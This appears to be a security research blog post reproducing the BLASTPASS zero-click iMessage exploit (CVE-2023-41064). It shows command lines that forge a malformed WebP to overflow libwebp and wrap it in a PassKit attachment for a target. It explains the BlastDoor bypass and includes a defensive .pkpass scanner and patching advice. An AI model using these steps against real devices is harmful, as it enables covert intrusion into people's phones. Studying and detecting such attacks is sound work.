    CVE-2023-41064 · 31 min · mhfh research · 2023-09-15

    Reproducing BLASTPASS: 0-click iMessage Implant

    Reverse engineering Apple's ImageIO PassKit attachment chain. We rebuild a malformed WebP that bypasses BlastDoor and lands code execution.

    #iOS #0-click #iMessage #ImageIO

    Overview

    BLASTPASS (CVE-2023-41064) is a 0-click chain delivered through a PassKit attachment in iMessage. The bug lives in ImageIO's WebP decoder.

    Forging the WebP

    $cat snippet.sh
    python3 forge_webp.py --huff-overflow 0x4141 --out blast.webp

    The crafted VP8L Huffman table overflows a heap buffer in libwebp's HuffmanTreeBuildExplicit.

    Wrapping in a PassKit attachment

    $cat snippet.sh
    python3 wrap_pkpass.py --payload blast.webp --recipient target@icloud

    Why BlastDoor doesn't help

    PassKit attachments are processed outside the BlastDoor sandbox, giving us direct access to ImageIO in a privileged context.
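A defender-side check for the attachment path described in the two sections above, added here as an example and not part of the original post or its tooling: it opens a .pkpass bundle (assumed here to be a zip archive) and flags members that carry a WebP container with a lossless VP8L bitstream, or WebP data under a non-.webp file name. The RIFF chunk walker and the sample bundle are constructed for this example.

```python
import io
import struct
import zipfile


def webp_chunks(data: bytes):
    """Walk a RIFF/WEBP container and return [(fourcc, payload), ...].
    Returns [] for non-WebP input; a bogus chunk size ends the walk quietly."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
        return []
    chunks = []
    pos = 12
    end = min(len(data), 8 + struct.unpack("<I", data[4:8])[0])
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        chunks.append((fourcc, data[pos + 8:pos + 8 + size]))
        pos += 8 + size + (size & 1)  # RIFF chunks are padded to even length
    return chunks


def make_webp(fourcc: bytes, payload: bytes) -> bytes:
    """Constructed minimal WebP container with one chunk (sample data only)."""
    pad = b"\x00" if len(payload) & 1 else b""
    chunk = fourcc + struct.pack("<I", len(payload)) + payload + pad
    return b"RIFF" + struct.pack("<I", 4 + len(chunk)) + b"WEBP" + chunk


def sample_pkpass() -> bytes:
    """Constructed .pkpass-style zip: a manifest plus two image members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pass.json", '{"formatVersion": 1}')
        zf.writestr("logo.webp", make_webp(b"VP8L", b"\x2f\x00\x00\x00\x00"))
        zf.writestr("icon.png", make_webp(b"VP8 ", b"\x00" * 6))  # WebP behind .png name
    return buf.getvalue()


def scan_pkpass(blob: bytes):
    """Return (member_name, reason) findings for WebP content inside the bundle."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            chunks = webp_chunks(zf.read(name))
            if not chunks:
                continue
            if any(fourcc == b"VP8L" for fourcc, _ in chunks):
                findings.append((name, "lossless VP8L bitstream"))
            if not name.lower().endswith(".webp"):
                findings.append((name, "WebP container under non-.webp name"))
    return findings
```

The scan only identifies WebP content by its container, so it is a triage signal for attachments arriving outside BlastDoor, not a judgment on whether a given Huffman table is malformed.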

    Mitigation

    Update to iOS 16.6.1 and enable Lockdown Mode.